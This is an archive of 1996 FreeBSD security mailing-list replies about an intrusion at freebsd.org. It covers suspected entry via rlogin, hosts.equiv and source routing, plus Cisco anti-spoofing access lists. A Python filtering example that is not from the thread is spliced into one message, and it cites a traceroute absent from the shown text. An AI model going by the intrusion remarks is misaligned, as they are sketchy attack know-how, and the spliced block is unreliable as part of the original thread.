Received: from gvr.win.tue.nl (root@gvr.win.tue.nl [131.155.210.19]) by freefall.freebsd.org (8.7.5/8.7.3) with SMTP id BAA03693; Mon, 24 Jun 1996 01:22:33 -0700 (PDT)
Received: by gvr.win.tue.nl (8.6.12/1.53) id KAA12148; Mon, 24 Jun 1996 10:22:12 +0200
From: guido@gvr.win.tue.nl (Guido van Rooij)
Message-Id: <199606240822.KAA12148@gvr.win.tue.nl>
Subject: Re: I need help on this one - please help me track this guy down!
To: jkh@time.cdrom.com (Jordan K. Hubbard)
Date: Mon, 24 Jun 1996 10:22:12 +0200 (MET DST)
Cc: hackers@freebsd.org, security@freebsd.org, ache@freebsd.org
In-Reply-To: <10326.835597770@time.cdrom.com> from "Jordan K. Hubbard" at "Jun 23, 96 11:29:30 pm"
X-Mailer: ELM [version 2.4ME+ PL17 (25)]
MIME-Version: 1.0
Content-Type: text/plain; charset=US-ASCII
Content-Transfer-Encoding: 7bit
Sender: owner-security@freebsd.org
X-Loop: FreeBSD.org
Precedence: bulk

Jordan K. Hubbard wrote:
> > Do you have anti-spoof filter rules in your backbone router? If not
> > install them. If so, please add packets coming in from localhost
>
> How do you install such things on a cisco 2500? :-) Seriously, if
> there's a way then I can get someone from cisco to help me out, but I
> first need to know that it's even a reasonable request.

Put an access group *in*. On the interface to your ISP. Deny all packets originating from ip numbers on your internal network. Allow anything else.

>
> > to them. I don't know why he got in, but you can suspect rlogin plus
> > a localhost entry in host.equiv combined with source routed packets.
>
> Hmmm. We have reason to believe that he *didn't* get root (though
> we're still assuming he did, just to be paranoid) and if the mod times
> can be trusted, hosts.equiv hasn't been touched in many months (and
> localhost is commented out).

Okay. Then this was not the problem.

-Guido

From owner-freebsd-security Mon Jun 24 02:38:55 1996
Return-Path: owner-security
Received: (from root@localhost) by freefall.freebsd.org (8.7.5/8.7.3) id CAA10597 for security-outgoing; Mon, 24 Jun 1996 02:38:55 -0700 (PDT)
Received: from minnow.render.com (render.demon.co.uk [158.152.30.118]) by freefall.freebsd.org (8.7.5/8.7.3) with SMTP id CAA10557; Mon, 24 Jun 1996 02:38:42 -0700 (PDT)
Received: (from dfr@localhost) by minnow.render.com (8.6.12/8.6.9) id KAA26539; Mon, 24 Jun 1996 10:41:27 +0100
Date: Mon, 24 Jun 1996 10:41:26 +0100 (BST)
From: Doug Rabson
To: "Jordan K. Hubbard"
cc: Amancio Hasty , hackers@FreeBSD.org, security@FreeBSD.org, ache@FreeBSD.org
Subject: Re: I need help on this one - please help me track this guy down!
In-Reply-To: <8378.835580425@time.cdrom.com>
Message-ID:
MIME-Version: 1.0
Content-Type: TEXT/PLAIN; charset=US-ASCII
Sender: owner-security@FreeBSD.org
X-Loop: FreeBSD.org
Precedence: bulk

On Sun, 23 Jun 1996, Jordan K. Hubbard wrote:
> > Also since "you" were logged in , try to look in the logs for a
> > a loggin session of a foreign host and I would report the incident to the
> > FBI 8)
>
> All we have are the "last" logs, which show:
>
> jkh ttyp2 a235.pu.ru Sun Jun 23 16:50 - 17:18 (00:28)
> jkh ttyp3 a235.pu.ru Sun Jun 23 15:00 - 15:34 (00:33)
>
> If someone at the russian site could help correlate this time (PST) to
> the local time at wherever a235.ru.pu came in from, we could at least
> narrow down which user(s) it might have been.
>
> Also, I think that calling the FBI on this one is only likely to get
> me put on infinite hold when they hear that the perpetrator is in
> Russia. :-)

Which parts of the archive do you have write access to? It just occurred to me that inserting a virus into the release version of quake would be a far more devastating attack than tampering with a FreeBSD release.

--
Doug Rabson, Microsoft RenderMorphics Ltd.
Mail: dfr@render.com
Phone: +44 171 251 4411
FAX: +44 171 251 0939

From owner-freebsd-security Mon Jun 24 02:49:35 1996
Return-Path: owner-security
Received: (from root@localhost) by freefall.freebsd.org (8.7.5/8.7.3) id CAA11802 for security-outgoing; Mon, 24 Jun 1996 02:49:35 -0700 (PDT)
Received: from rah.star-gate.com (rah.star-gate.com [204.188.121.18]) by freefall.freebsd.org (8.7.5/8.7.3) with ESMTP id CAA11792; Mon, 24 Jun 1996 02:49:29 -0700 (PDT)
Received: from rah.star-gate.com (localhost.v-site.net [127.0.0.1]) by rah.star-gate.com (8.7.5/8.7.3) with ESMTP id CAA00862; Mon, 24 Jun 1996 02:48:40 -0700 (PDT)
Message-Id: <199606240948.CAA00862@rah.star-gate.com>
X-Mailer: exmh version 1.6.5 12/11/95
To: Doug Rabson
cc: "Jordan K. Hubbard" , hackers@FreeBSD.org, security@FreeBSD.org, ache@FreeBSD.org
Subject: Re: I need help on this one - please help me track this guy down!
In-reply-to: Your message of "Mon, 24 Jun 1996 10:41:26 BST."
Mime-Version: 1.0
Content-Type: text/plain; charset=us-ascii
Date: Mon, 24 Jun 1996 02:48:40 -0700
From: Amancio Hasty
Sender: owner-security@FreeBSD.org
X-Loop: FreeBSD.org
Precedence: bulk

Hmmm... voluntary shutdown, till you can examine, rebuild freebsd.org? Especially since the intruder wiped out the home directory...

Amancio

>From The Desk Of Doug Rabson :
> On Sun, 23 Jun 1996, Jordan K. Hubbard wrote:
>
>
> Which parts of the archive do you have write access to? It just occurred
> to me that inserting a virus into the release version of quake would be a
> far more devastating attack than tampering with a FreeBSD release.
>

From owner-freebsd-security Mon Jun 24 03:17:32 1996
Return-Path: owner-security
Received: (from root@localhost) by freefall.freebsd.org (8.7.5/8.7.3) id DAA01850 for security-outgoing; Mon, 24 Jun 1996 03:17:32 -0700 (PDT)
Received: from time.cdrom.com (time.cdrom.com [204.216.27.226]) by freefall.freebsd.org (8.7.5/8.7.3) with ESMTP id DAA01844; Mon, 24 Jun 1996 03:17:29 -0700 (PDT)
Received: from time.cdrom.com (localhost [127.0.0.1]) by time.cdrom.com (8.7.5/8.6.9) with ESMTP id DAA11150; Mon, 24 Jun 1996 03:15:51 -0700 (PDT)
To: Ng Pheng Siong
cc: Terry Lambert , guido@gvr.win.tue.nl, hackers@FreeBSD.ORG, security@FreeBSD.ORG, ache@FreeBSD.ORG
Subject: Re: I need help on this one - please help me track this guy down!
In-reply-to: Your message of "Mon, 24 Jun 1996 15:35:01 +0800."
Date: Mon, 24 Jun 1996 03:15:51 -0700
Message-ID: <11148.835611351@time.cdrom.com>
From: "Jordan K. Hubbard"
Sender: owner-security@FreeBSD.ORG
X-Loop: FreeBSD.org
Precedence: bulk

We're pretty sure we know how he got in at this point but I'm going to refrain from saying anything until we have had a chance to talk with the FreeBSD security officers about this incident.

Jordan

> On Sun, 23 Jun 1996, Terry Lambert wrote:
> > 1) Do not believe this. Assume he got root.
>
> Fundamental question: how did the intruder get in? Telnet with reusable
> passwords, or something else?
>
> Note that the intruder is probably reading these lists. ;)
>
> - PS
> --
> Ng Pheng Siong * Finger for PGP key.
> Pacific Internet Pte Ltd * Singapore
>
> Fast, secure, cheap. Pick two.
>

From owner-freebsd-security Mon Jun 24 03:32:14 1996
Return-Path: owner-security
Received: (from root@localhost) by freefall.freebsd.org (8.7.5/8.7.3) id DAA02889 for security-outgoing; Mon, 24 Jun 1996 03:32:14 -0700 (PDT)
Received: from root.com (implode.root.com [198.145.90.17]) by freefall.freebsd.org (8.7.5/8.7.3) with ESMTP id DAA02882; Mon, 24 Jun 1996 03:32:12 -0700 (PDT)
Received: from localhost (localhost [127.0.0.1]) by root.com (8.7.5/8.6.5) with SMTP id DAA13003; Mon, 24 Jun 1996 03:31:49 -0700 (PDT)
Message-Id: <199606241031.DAA13003@root.com>
X-Authentication-Warning: implode.root.com: Host localhost [127.0.0.1] didn't use HELO protocol
To: Doug Rabson
cc: "Jordan K. Hubbard" , Amancio Hasty , hackers@FreeBSD.org, security@FreeBSD.org, ache@FreeBSD.org
Subject: Re: I need help on this one - please help me track this guy down!
In-reply-to: Your message of "Mon, 24 Jun 1996 10:41:26 BST."
From: David Greenman
Reply-To: davidg@root.com
Date: Mon, 24 Jun 1996 03:31:48 -0700
Sender: owner-security@FreeBSD.org
X-Loop: FreeBSD.org
Precedence: bulk

>Which parts of the archive do you have write access to? It just occurred
>to me that inserting a virus into the release version of quake would be a
>far more devastating attack than tampering with a FreeBSD release.

Based on what I've discovered at this point, I don't think this has occurred. We're not going to discuss this issue in public any further. If you have any ideas or advice, please send it to Jordan and me. Thanks.

-DG

David Greenman
Core-team/Principal Architect, The FreeBSD Project

From owner-freebsd-security Mon Jun 24 03:49:18 1996
Return-Path: owner-security
Received: (from root@localhost) by freefall.freebsd.org (8.7.5/8.7.3) id DAA03610 for security-outgoing; Mon, 24 Jun 1996 03:49:18 -0700 (PDT)
Received: from shogun.tdktca.com ([206.26.1.21]) by freefall.freebsd.org (8.7.5/8.7.3) with ESMTP id DAA03605; Mon, 24 Jun 1996 03:49:15 -0700 (PDT)
Received: from shogun.tdktca.com (daemon@localhost) by shogun.tdktca.com (8.7.2/8.7.2) with ESMTP id FAA13845; Mon, 24 Jun 1996 05:50:35 -0500 (CDT)
Received: from orion.fa.tdktca.com ([163.49.131.130]) by shogun.tdktca.com (8.7.2/8.7.2) with SMTP id FAA13840; Mon, 24 Jun 1996 05:50:34 -0500 (CDT)
Received: from orion (alex@localhost [127.0.0.1]) by orion.fa.tdktca.com (8.6.12/8.6.9) with SMTP id FAA15083; Mon, 24 Jun 1996 05:52:57 -0500
Message-ID: <31CE7387.C50A843@fa.tdktca.com>
Date: Mon, 24 Jun 1996 05:52:55 -0500
From: Alex Nash
Organization: TDK Factory Automation
X-Mailer: Mozilla 2.0 (X11; I; Linux 1.2.13 i586)
MIME-Version: 1.0
To: "Jordan K. Hubbard"
CC: Ng Pheng Siong , Terry Lambert , guido@gvr.win.tue.nl, hackers@FreeBSD.ORG, security@FreeBSD.ORG, ache@FreeBSD.ORG
Subject: Re: I need help on this one - please help me track this guy down!
References: <11148.835611351@time.cdrom.com>
Content-Type: text/plain; charset=us-ascii
Content-Transfer-Encoding: 7bit
Sender: owner-security@FreeBSD.ORG
X-Loop: FreeBSD.org
Precedence: bulk

Jordan K. Hubbard wrote:
>
> We're pretty sure we know how he got in at this point but I'm going
> to refrain from saying anything until we have had a chance to talk
> with the FreeBSD security officers about this incident.
>
> Jordan
>
> > On Sun, 23 Jun 1996, Terry Lambert wrote:
> > > 1) Do not believe this. Assume he got root.
> >
> > Fundamental question: how did the intruder get in? Telnet with reusable
> > passwords, or something else?
> >
> > Note that the intruder is probably reading these lists. ;)

Well not only do you know how he got in, but if he really is reading these lists, we've got our man (or woman, as the case may be). There's only one user from pu.ru on the combined hackers/security lists. :)

Disclaimer: I'm kidding, I would not point the finger at this person based on such circumstantial evidence.

Alex

From owner-freebsd-security Mon Jun 24 03:55:25 1996
Return-Path: owner-security
Received: (from root@localhost) by freefall.freebsd.org (8.7.5/8.7.3) id DAA03960 for security-outgoing; Mon, 24 Jun 1996 03:55:25 -0700 (PDT)
Received: from time.cdrom.com (time.cdrom.com [204.216.27.226]) by freefall.freebsd.org (8.7.5/8.7.3) with ESMTP id DAA03949; Mon, 24 Jun 1996 03:55:23 -0700 (PDT)
Received: from time.cdrom.com (localhost [127.0.0.1]) by time.cdrom.com (8.7.5/8.6.9) with ESMTP id DAA11301; Mon, 24 Jun 1996 03:55:06 -0700 (PDT)
To: Amancio Hasty
cc: Doug Rabson , hackers@FreeBSD.org, security@FreeBSD.org, ache@FreeBSD.org
Subject: Re: I need help on this one - please help me track this guy down!
In-reply-to: Your message of "Mon, 24 Jun 1996 02:48:40 PDT." <199606240948.CAA00862@rah.star-gate.com>
Date: Mon, 24 Jun 1996 03:55:05 -0700
Message-ID: <11299.835613705@time.cdrom.com>
From: "Jordan K. Hubbard"
Sender: owner-security@FreeBSD.org
X-Loop: FreeBSD.org
Precedence: bulk

Already in progress, yep!

>
> Hmmm... voluntary shutdown, till you can examine, rebuild freebsd.org?
> Especially since the intruder wiped out the home directory...
>
> Amancio
>
> >From The Desk Of Doug Rabson :
> > On Sun, 23 Jun 1996, Jordan K. Hubbard wrote:
> >
> >
> > Which parts of the archive do you have write access to? It just occurred
> > to me that inserting a virus into the release version of quake would be a
> > far more devastating attack than tampering with a FreeBSD release.
> >
> >
>

From owner-freebsd-security Mon Jun 24 05:46:04 1996
Return-Path: owner-security
Received: (from root@localhost) by freefall.freebsd.org (8.7.5/8.7.3) id FAA18365 for security-outgoing; Mon, 24 Jun 1996 05:46:04 -0700 (PDT)
Received: from mexico.brainstorm.eu.org (root@mexico.brainstorm.eu.org [193.56.58.253]) by freefall.freebsd.org (8.7.5/8.7.3) with ESMTP id FAA18344; Mon, 24 Jun 1996 05:45:57 -0700 (PDT)
Received: from brasil.brainstorm.eu.org (brasil.brainstorm.eu.org [193.56.58.33]) by mexico.brainstorm.eu.org (8.7.5/8.7.3) with ESMTP id OAA06092; Mon, 24 Jun 1996 14:45:53 +0200
Received: (from uucp@localhost) by brasil.brainstorm.eu.org (8.6.12/8.6.12) with UUCP id OAA14741; Mon, 24 Jun 1996 14:45:38 +0200
Received: (from roberto@localhost) by keltia.freenix.fr (8.8.Alpha.5/keltia-uucp-2.8) id NAA09908; Mon, 24 Jun 1996 13:43:56 +0200 (MET DST)
From: Ollivier Robert
Message-Id: <199606241143.NAA09908@keltia.freenix.fr>
Subject: Re: I need help on this one - please help me track this guy down!
To: jkh@time.cdrom.com (Jordan K. Hubbard)
Date: Mon, 24 Jun 1996 13:43:56 +0200 (MET DST)
Cc: guido@gvr.win.tue.nl, hackers@FreeBSD.org, security@FreeBSD.org, ache@FreeBSD.org
In-Reply-To: <10326.835597770@time.cdrom.com> from "Jordan K. Hubbard" at "Jun 23, 96 11:29:30 pm"
X-Operating-System: FreeBSD 2.2-CURRENT ctm#2111
X-Mailer: ELM [version 2.4ME+ PL22 (25)]
MIME-Version: 1.0
Content-Type: text/plain; charset=US-ASCII
Content-Transfer-Encoding: 7bit
Sender: owner-security@FreeBSD.org
X-Loop: FreeBSD.org
Precedence: bulk

It seems that Jordan K. Hubbard said:
> How do you install such things on a cisco 2500? :-) Seriously, if
> there's a way then I can get someone from cisco to help me out, but I
> first need to know that it's even a reasonable request.

If you use Serial0 for the Internet and A.B.C.0/24 in your internal network, use something like the following:

!
! Refuses loose/strict source routed packets
!
no ip source-route
!
interface Serial0
 ip address A.B.C.254 255.255.255.0
 ip access-g 100 in
 ip access-g 101 out
...
! access list for incoming packets
! should fix most of the new attacks when a spoofed packet
! is trying to come from the outside with a source address
! from our network which is impossible.
!
no access-list 100
!
! Rejects our own addresses C-Class A.B.C.0/24
!
access-list 100 deny ip A.B.C.0 0.0.0.255 any
!
! Rejects EPITA B-Class 163.5.0.0/16
!
access-list 100 deny ip 163.5.0.0 0.0.255.255 any
!
! Rejects special addresses
!
access-list 100 deny ip 127.0.0.0 0.255.255.255 any
!
! RFC-1918 IANA reserved A/B/C classes
! A-Class 10.0.0.0/8
!
access-list 100 deny ip 10.0.0.0 0.255.255.255 any
!
! B-Classes 172.16.0.0/12
!
access-list 100 deny ip 172.16.0.0 0.15.255.255 any
!
! C-Classes 192.168.0.0/16
!
access-list 100 deny ip 192.168.0.0 0.0.255.255 any
!
! Accepts the rest
!
access-list 100 permit ip any A.B.C.0 0.0.0.255

--
Ollivier ROBERT -=- The daemon is FREE! -=- roberto@keltia.freenix.fr
FreeBSD keltia.freenix.fr 2.2-CURRENT #11: Thu Jun 13 11:01:47 MET DST 1996

From owner-freebsd-security Mon Jun 24 05:48:07 1996
Return-Path: owner-security
Received: (from root@localhost) by freefall.freebsd.org (8.7.5/8.7.3) id FAA18531 for security-outgoing; Mon, 24 Jun 1996 05:48:07 -0700 (PDT)
Received: from irz301.inf.tu-dresden.de (irz301.inf.tu-dresden.de [141.76.1.11]) by freefall.freebsd.org (8.7.5/8.7.3) with SMTP id FAA18484; Mon, 24 Jun 1996 05:47:52 -0700 (PDT)
Received: from sax.sax.de by irz301.inf.tu-dresden.de (8.6.12/8.6.12-s1) with ESMTP id IAA29110; Mon, 24 Jun 1996 08:51:12 +0200
Received: (from uucp@localhost) by sax.sax.de (8.6.12/8.6.12-s1) with UUCP id IAA15569; Mon, 24 Jun 1996 08:51:11 +0200
Received: (from j@localhost) by uriah.heep.sax.de (8.7.5/8.6.9) id IAA12290; Mon, 24 Jun 1996 08:25:07 +0200 (MET DST)
From: J Wunsch
Message-Id: <199606240625.IAA12290@uriah.heep.sax.de>
Subject: Re: I need help on this one - please help me track this guy down!
To: jkh@time.cdrom.com (Jordan K. Hubbard)
Date: Mon, 24 Jun 1996 08:25:06 +0200 (MET DST)
Cc: msmith@atrad.adelaide.edu.au, hackers@freebsd.org, security@freebsd.org, ache@freebsd.org
Reply-To: joerg_wunsch@uriah.heep.sax.de (Joerg Wunsch)
In-Reply-To: <9123.835587998@time.cdrom.com> from "Jordan K. Hubbard" at "Jun 23, 96 08:46:38 pm"
X-Phone: +49-351-2012 669
X-PGP-Fingerprint: DC 47 E6 E4 FF A6 E9 8F 93 21 E0 7D F9 12 D6 4E
X-Mailer: ELM [version 2.4ME+ PL17 (25)]
MIME-Version: 1.0
Content-Type: text/plain; charset=US-ASCII
Content-Transfer-Encoding: 7bit
Sender: owner-security@freebsd.org
X-Loop: FreeBSD.org
Precedence: bulk

As Jordan K. Hubbard wrote:
> [jaeger@com removed from cc - he needs to fix his headers :-)]

While we are at it, wasn't `jaeger' one of the nicknames of the intruder in Stoll's ``The Cuckoo's egg''? :-}

--
cheers, J"org
joerg_wunsch@uriah.heep.sax.de -- http://www.sax.de/~joerg/ -- NIC: JW11-RIPE
Never trust an operating system you don't have sources for. ;-)

From owner-freebsd-security Mon Jun 24 06:48:48 1996
Return-Path: owner-security
Received: (from root@localhost) by freefall.freebsd.org (8.7.5/8.7.3) id GAA21730 for security-outgoing; Mon, 24 Jun 1996 06:48:48 -0700 (PDT)
Received: from horst.bfd.com (horst.bfd.com [204.160.242.10]) by freefall.freebsd.org (8.7.5/8.7.3) with ESMTP id GAA21725 for ; Mon, 24 Jun 1996 06:48:46 -0700 (PDT)
Received: from harlie.bfd.com (bastion.bfd.com [204.160.242.2]) by horst.bfd.com (8.7.5/8.7.3) with SMTP id GAA13631; Mon, 24 Jun 1996 06:48:41 -0700 (PDT)
Date: Mon, 24 Jun 1996 06:48:42 -0700 (PDT)
From: "Eric J. Schwertfeger"
To: "Jordan K. Hubbard"
cc: Guido van Rooij , security@FreeBSD.org
Subject: Re: I need help on this one - please help me track this guy down!
In-Reply-To: <10326.835597770@time.cdrom.com>
Message-ID:
MIME-Version: 1.0
Content-Type: TEXT/PLAIN; charset=US-ASCII
Sender: owner-security@FreeBSD.org
X-Loop: FreeBSD.org
Precedence: bulk

On Sun, 23 Jun 1996, Jordan K. Hubbard wrote:
> > Do you have anti-spoof filter rules in your backbone router? If not
> > install them. If so, please add packets coming in from localhost
>
> How do you install such things on a cisco 2500? :-) Seriously, if
> there's a way then I can get someone from cisco to help me out, but I
> first need to know that it's even a reasonable request.

Very simply, considering what most people refer to as anti-spoof filters are filters that make sure internal addresses aren't coming in on an external interface. On our 2500, the very first incoming rule on the serial port that goes to our T1 is "deny anything that has a source address within our class C address." Now I get to add 127.0.0.0 :-)

This way, if we see an address on the internal networks that has our Class C address (or our 192.168.X.X addresses), we know it was generated internally, so if it is a hack attempt, we've already been breached.

If there are better anti-spoofing filters, I'm not aware of them, and will gladly listen.

If you need any more help than the explanation (If you know Cisco filtering rules, the rest is simple), feel free to email me.
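The anti-spoof rule that Guido, Ollivier and Eric describe for the ISP-facing interface (drop anything arriving from outside whose source is one of our own addresses, or lies in 127.0.0.0/8 or the RFC 1918 ranges), plus the outbound check and the 0.0.0.0/8 range Joe Greco recommends later in the thread, modelled as an added example. This is not from the thread or from any of the posters; Ollivier's message gives the real Cisco syntax, and this block only shows the decision the access list makes. The same reserved-range check is also run over the tail of the traceroute Guido quoted, where it flags the hop that reports 127.0.0.1. The prefix 192.0.2.0/24 stands in for the thread's A.B.C.0/24 placeholder (an assumption), and the inbound packet sample is constructed.

```python
"""Anti-spoof (ingress/egress) source-address check.

Added example; not code from the thread.  OUR_NETWORK is an assumption
standing in for the thread's A.B.C.0/24 placeholder.
"""
import ipaddress
import re
from typing import List, Optional, Tuple

# Assumption: the site's own prefix ("A.B.C.0/24" in the thread).
OUR_NETWORK = ipaddress.ip_network("192.0.2.0/24")

# Sources that must never be seen on the external interface, either way.
MARTIANS = [
    ("loopback 127.0.0.0/8", ipaddress.ip_network("127.0.0.0/8")),
    ("this-network 0.0.0.0/8", ipaddress.ip_network("0.0.0.0/8")),
    ("RFC 1918 10.0.0.0/8", ipaddress.ip_network("10.0.0.0/8")),
    ("RFC 1918 172.16.0.0/12", ipaddress.ip_network("172.16.0.0/12")),
    ("RFC 1918 192.168.0.0/16", ipaddress.ip_network("192.168.0.0/16")),
]


def martian_reason(ip: str) -> Optional[str]:
    """Name the reserved range `ip` falls in, or None if it is routable."""
    addr = ipaddress.ip_address(ip)
    for name, net in MARTIANS:
        if addr in net:
            return f"martian source ({name})"
    return None


def drop_reason(src: str, direction: str) -> Optional[str]:
    """Why a packet with source `src` should be dropped on the ISP link.

    direction is "in" (arriving from the ISP) or "out" (leaving towards
    it).  Returns None when the packet passes.
    """
    reason = martian_reason(src)
    if reason:
        return reason
    addr = ipaddress.ip_address(src)
    if direction == "in" and addr in OUR_NETWORK:
        # A packet claiming an inside source cannot legitimately arrive
        # from the outside: this is the classic anti-spoof rule.
        return f"spoofed internal source {addr} on external interface"
    if direction == "out" and addr not in OUR_NETWORK:
        # Egress check: nothing leaves with a source that is not ours.
        return f"egress source {addr} is not in {OUR_NETWORK}"
    return None


def filter_packets(packets: List[Tuple[str, str]], direction: str):
    """Split (src, dst) pairs into (accepted, dropped-with-reason) lists."""
    accepted, dropped = [], []
    for src, dst in packets:
        reason = drop_reason(src, direction)
        if reason is None:
            accepted.append((src, dst))
        else:
            dropped.append((src, dst, reason))
    return accepted, dropped


# One traceroute hop: "<hop> <name> (<ip>) ..."; "* * *" lines do not match.
HOP_RE = re.compile(r"^\s*(\d+)\s+(\S+)\s+\((\d+(?:\.\d+){3})\)")


def suspicious_hops(traceroute_text: str) -> List[Tuple[int, str, str, str]]:
    """Flag traceroute hops that report an address from a reserved range."""
    flagged = []
    for line in traceroute_text.splitlines():
        m = HOP_RE.match(line)
        if not m:
            continue
        hop, name, ip = m.groups()
        reason = martian_reason(ip)
        if reason:
            flagged.append((int(hop), name, ip, reason))
    return flagged


# Last hops of the traceroute quoted in the thread.
TRACEROUTE_TAIL = """\
 9 slip-0.pu.ru (193.124.85.1) 840.489 ms 671.729 ms 650.750 ms
10 nat.pu.ru (193.124.85.134) 638.649 ms 653.720 ms 720.170 ms
11 gw.pu.ru (193.124.85.219) 752.144 ms 645.046 ms 641.413 ms
12 localhost (127.0.0.1) 670.113 ms 702.233 ms 695.733 ms
"""

# Constructed sample of inbound packets (src, dst) on the ISP interface.
SAMPLE_INBOUND = [
    ("198.51.100.9", "192.0.2.25"),   # ordinary outside host: passes
    ("192.0.2.7", "192.0.2.25"),      # claims to be inside: spoofed
    ("127.0.0.1", "192.0.2.25"),      # loopback source: martian
    ("10.1.2.3", "192.0.2.25"),       # RFC 1918 source: martian
]

if __name__ == "__main__":
    for hop in suspicious_hops(TRACEROUTE_TAIL):
        print("hop %d %s (%s): %s" % hop)
    ok, bad = filter_packets(SAMPLE_INBOUND, "in")
    print("accepted:", ok)
    for src, dst, why in bad:
        print(f"dropped {src} -> {dst}: {why}")
```

The order of checks mirrors the access list: reserved ranges are rejected regardless of direction, then the direction-specific ownership test runs, and only then does a packet pass. Keeping the per-address decision in `drop_reason` means the same logic can be applied to a packet trace, a syslog feed from the router, or, as here, to a traceroute whose last hop claims to be localhost.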
From owner-freebsd-security Mon Jun 24 06:53:03 1996 Return-Path: owner-security Received: (from root@localhost) by freefall.freebsd.org (8.7.5/8.7.3) id GAA21846 for security-outgoing; Mon, 24 Jun 1996 06:53:03 -0700 (PDT) Received: from brasil.moneng.mei.com (brasil.moneng.mei.com [151.186.109.160]) by freefall.freebsd.org (8.7.5/8.7.3) with ESMTP id GAA21840; Mon, 24 Jun 1996 06:52:58 -0700 (PDT) Received: (from jgreco@localhost) by brasil.moneng.mei.com (8.7.Beta.1/8.7.Beta.1) id IAA05446; Mon, 24 Jun 1996 08:51:40 -0500 
From: Joe Greco
Message-Id: <199606241351.IAA05446@brasil.moneng.mei.com>
Subject: Re: I need help on this one - please help me track this guy down!
To: guido@gvr.win.tue.nl (Guido van Rooij)
Date: Mon, 24 Jun 1996 08:51:39 -0500 (CDT)
Cc: jkh@time.cdrom.com, hackers@FreeBSD.ORG, security@FreeBSD.ORG, ache@FreeBSD.ORG
In-Reply-To: <199606240822.KAA12148@gvr.win.tue.nl> from "Guido van Rooij" at Jun 24, 96 10:22:12 am
X-Mailer: ELM [version 2.4 PL24]
Content-Type: text
Sender: owner-security@FreeBSD.ORG
X-Loop: FreeBSD.org
Precedence: bulk

> > How do you install such things on a cisco 2500? :-) Seriously, if
> > there's a way then I can get someone from cisco to help me out, but I
> > first need to know that it's even a reasonable request.
>
> Put an access group *in*. On the interface to your ISP. Deny all
> packets originating from ip numbers on your internal network.
> Allow anything else.

Better yet, do not allow just "anything" else...

I block the RFC1597 "private internets" and 127.0.0.0/8 and 0.0.0.0/8 on
both inbound and outbound filters, in addition to blocking inbound addresses
with my network numbers.. basically they don't survive my routers :-)

I don't have a Cisco manual handy, I do remember that the syntax is a bit
grungy, but very flexible.

Note: IIRC, the CPU on a 2500 is about as fast as a VW bug. You might be
better off getting a PC, running FreeBSD, and doing a firewall on that ;-)
You could even dump the 2500 in favor of one of ET's sync serial cards.

...
Joe
-------------------------------------------------------------------------------
Joe Greco - Systems Administrator                          jgreco@ns.sol.net
Solaria Public Access UNIX - Milwaukee, WI                     414/546-7968

From owner-freebsd-security Mon Jun 24 07:19:48 1996
Return-Path: owner-security
Received: (from root@localhost) by freefall.freebsd.org (8.7.5/8.7.3) id HAA23623 for security-outgoing; Mon, 24 Jun 1996 07:19:48 -0700 (PDT)
Received: from gvr.win.tue.nl (root@gvr.win.tue.nl [131.155.210.19]) by freefall.freebsd.org (8.7.5/8.7.3) with SMTP id HAA23611; Mon, 24 Jun 1996 07:19:37 -0700 (PDT)
Received: by gvr.win.tue.nl (8.6.12/1.53) id QAA12781; Mon, 24 Jun 1996 16:17:58 +0200
From: guido@gvr.win.tue.nl (Guido van Rooij)
Message-Id: <199606241417.QAA12781@gvr.win.tue.nl>
Subject: Re: I need help on this one - please help me track this guy down!
To: jgreco@brasil.moneng.mei.com (Joe Greco)
Date: Mon, 24 Jun 1996 16:17:57 +0200 (MET DST)
Cc: jkh@time.cdrom.com, hackers@FreeBSD.ORG, security@FreeBSD.ORG, ache@FreeBSD.ORG
In-Reply-To: <199606241351.IAA05446@brasil.moneng.mei.com> from Joe Greco at "Jun 24, 96 08:51:39 am"
X-Mailer: ELM [version 2.4ME+ PL17 (25)]
MIME-Version: 1.0
Content-Type: text/plain; charset=US-ASCII
Content-Transfer-Encoding: 7bit
Sender: owner-security@FreeBSD.ORG
X-Loop: FreeBSD.org
Precedence: bulk

Joe Greco wrote:
> > > How do you install such things on a cisco 2500? :-) Seriously, if
> > > there's a way then I can get someone from cisco to help me out, but I
> > > first need to know that it's even a reasonable request.
> >
> > Put an access group *in*. On the interface to your ISP. Deny all
> > packets originating from ip numbers on your internal network.
> > Allow anything else.
>
> Better yet, do not allow just "anything" else...
>
> I block the RFC1597 "private internets" and 127.0.0.0/8 and 0.0.0.0/8 on
> both inbound and outbound filters, in addition to blocking inbound addresses
> with my network numbers.. basically they don't survive my routers :-)
>

We do too..but for the sake of simplicity I didn't mention the RFC1597
addresses. The 0.0.0.0/8 is new to me..what is its purpose?

-Guido

From owner-freebsd-security Mon Jun 24 07:29:21 1996
Return-Path: owner-security
Received: (from root@localhost) by freefall.freebsd.org (8.7.5/8.7.3) id HAA24582 for security-outgoing; Mon, 24 Jun 1996 07:29:21 -0700 (PDT)
Received: from brasil.moneng.mei.com (brasil.moneng.mei.com [151.186.109.160]) by freefall.freebsd.org (8.7.5/8.7.3) with ESMTP id HAA24574; Mon, 24 Jun 1996 07:29:16 -0700 (PDT)
Received: (from jgreco@localhost) by brasil.moneng.mei.com (8.7.Beta.1/8.7.Beta.1) id JAA05533; Mon, 24 Jun 1996 09:28:02 -0500
From: Joe Greco
Message-Id: <199606241428.JAA05533@brasil.moneng.mei.com>
Subject: Re: I need help on this one - please help me track this guy down!
To: guido@gvr.win.tue.nl (Guido van Rooij)
Date: Mon, 24 Jun 1996 09:28:01 -0500 (CDT)
Cc: jgreco@brasil.moneng.mei.com, jkh@time.cdrom.com, hackers@FreeBSD.ORG, security@FreeBSD.ORG, ache@FreeBSD.ORG
In-Reply-To: <199606241417.QAA12781@gvr.win.tue.nl> from "Guido van Rooij" at Jun 24, 96 04:17:57 pm
X-Mailer: ELM [version 2.4 PL24]
Content-Type: text
Sender: owner-security@FreeBSD.ORG
X-Loop: FreeBSD.org
Precedence: bulk

> > Better yet, do not allow just "anything" else...
> >
> > I block the RFC1597 "private internets" and 127.0.0.0/8 and 0.0.0.0/8 on
> > both inbound and outbound filters, in addition to blocking inbound addresses
> > with my network numbers.. basically they don't survive my routers :-)
> >
>
> We do too..but for the sake of simplicity I didn't mention the RFC1597
> addresses. The 0.0.0.0/8 is new to me..what is its purpose?

It's a reserved, unassigned network. I don't have an RFC handy to check,
but I believe that the reasoning might have been because of the "magic"
"address" 0.0.0.0 that it contains. It seems simpler to lose it than to
be in doubt, and I think I saw a detailed argument at one point,
anyways... ;-)

...
Joe
-------------------------------------------------------------------------------
Joe Greco - Systems Administrator                          jgreco@ns.sol.net
Solaria Public Access UNIX - Milwaukee, WI                     414/546-7968

From owner-freebsd-security Mon Jun 24 07:58:55 1996
Return-Path: owner-security
